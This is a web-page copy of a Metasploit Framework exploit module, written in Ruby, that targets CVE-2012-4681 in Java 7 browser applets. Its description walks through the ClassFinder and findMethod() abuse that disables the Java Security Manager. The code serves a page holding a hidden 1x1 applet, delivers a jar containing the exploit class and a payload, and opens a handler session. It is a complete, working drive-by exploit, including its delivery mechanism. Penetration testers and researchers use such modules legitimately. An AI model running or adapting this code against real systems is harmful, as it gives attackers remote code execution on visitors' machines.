CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  #include Msf::Exploit::Remote::BrowserAutopwn

12
  #autopwn_info({ :javascript => false })

13


14
  def initialize( info = {} )

15
    super( update_info( info,

16
      'Name'          => 'Java 7 Applet Remote Code Execution',

17
      'Description'   => %q{

18
        The exploit takes advantage of two issues in JDK 7: The ClassFinder and

19
        MethodFinder.findMethod().  Both were newly introduced in JDK 7.  ClassFinder is a

20
        replacement for classForName back in JDK 6. It allows untrusted code to obtain a

21
        reference and have access to a restricted package in JDK 7, which can be used to

22
        abuse sun.awt.SunToolkit (a restricted package).  With sun.awt.SunToolkit, we can

23
        actually invoke getField() by abusing findMethod() in Statement.invokeInternal()

24
        (but getField() must be public, and that's not always the case in JDK 6) in order

25
        to access Statement.acc's private field, modify AccessControlContext, and then

26
        disable Security Manager. Once Security Manager is disabled, we can execute

27
        arbitrary Java code.

28


29
        Our exploit has been tested successfully against multiple platforms, including:

30
        IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.

31
      },

32
      'License'       => MSF_LICENSE,

33
      'Author'        =>

34
        [

35
          'Adam Gowdiak',  # Vulnerability discovery according to Oracle's advisory

36
          'James Forshaw', # Vulnerability discovery according to Oracle's advisory

37
          'jduck',         # metasploit module

38
          'sinn3r',        # metasploit module

39
          'juan vazquez'   # metasploit module

40
        ],

41
      'References'    =>

42
        [

43
          [ 'CVE', '2012-4681' ],

44
          [ 'OSVDB', '84867' ],

45
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],

46
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],

47
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],

48
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],

49
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],

50
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],

51
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']

52
        ],

53
      'Platform'      => %w{ java linux win },

54
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

55
      'Targets'       =>

56
        [

57
          [ 'Generic (Java Payload)',

58
            {

59
              'Arch' => ARCH_JAVA,

60
              'Platform' => 'java'

61
            }

62
          ],

63
          [ 'Windows Universal',

64
            {

65
              'Arch' => ARCH_X86,

66
              'Platform' => 'win'

67
            }

68
          ],

69
          [ 'Linux x86',

70
            {

71
              'Arch' => ARCH_X86,

72
              'Platform' => 'linux'

73
            }

74
          ]

75
        ],

76
      'DefaultTarget'  => 0,

77
      'DisclosureDate' => '2012-08-26'

78
      ))

79
  end

80


81


82
  def on_request_uri( cli, request )

83


84
    if not request.uri.match(/\.jar$/i)

85
      if not request.uri.match(/\/$/)

86
        send_redirect(cli, get_resource() + '/', '')

87
        return

88
      end

89


90
      print_status("#{self.name} handling request")

91


92
      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )

93
      return

94
    end

95


96
    paths = [

97
      [ "Exploit.class" ]

98
    ]

99


100
    p = regenerate_payload(cli)

101


102
    jar  = p.encoded_jar

103
    paths.each do |path|

104
      1.upto(path.length - 1) do |idx|

105
        full = path[0,idx].join("/") + "/"

106
        if !(jar.entries.map{|e|e.name}.include?(full))

107
          jar.add_file(full, '')

108
        end

109
      end

110
      fd = File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2012-4681", path ), "rb")

111
      data = fd.read(fd.stat.size)

112
      jar.add_file(path.join("/"), data)

113
      fd.close

114
    end

115


116
    print_status("Sending Applet.jar")

117
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

118


119
    handler( cli )

120
  end

121


122
  def generate_html

123
    html  = "<html><head></head>"

124
    html += "<body>"

125
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"

126
    html += "</applet></body></html>"

127
    return html

128
  end

129
end

130


131